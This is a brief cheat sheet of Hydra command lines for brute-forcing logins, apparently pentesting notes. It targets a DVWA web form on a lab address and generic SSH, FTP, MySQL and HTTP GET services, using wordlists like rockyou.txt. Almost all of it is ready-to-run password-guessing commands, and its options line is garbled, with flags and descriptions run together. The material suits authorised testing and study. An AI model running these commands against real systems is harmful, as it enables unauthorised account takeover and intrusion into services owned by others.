Web forms
To launch password attacks in forms using http-post-form and injecting the variables like ^USER^. The data in the request can be obtained using Chrome dev tools or Burpsuite.
1
hydra -l admin -P /usr/share/jonh/password.lst 10.0.2.6 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&login=Login:Login failed" -f
The options are:
-uusername-Luser list-ppassword-PpasswordList-fexit at the first successful result server, where to attack servicetnumber of threads to run in parallelhttp-post-formservice.
Another example with http-get
1
hydra -l admin -P pass.txt $TARGET http-get /webdav
SSH
We use the ssh service.
1
hydra -l root -P /usr/share/wordlists/rockyou.txt.gz $TARGET ssh
FTP
1
hydra -t 4 -l Mike -P /usr/share/wordlists/rockyou.txt -vV $TARGET ftp
MySQL
1
hydra -t 4 -l root -P /usr/share/wordlists/rockyou.txt $TARGET mysql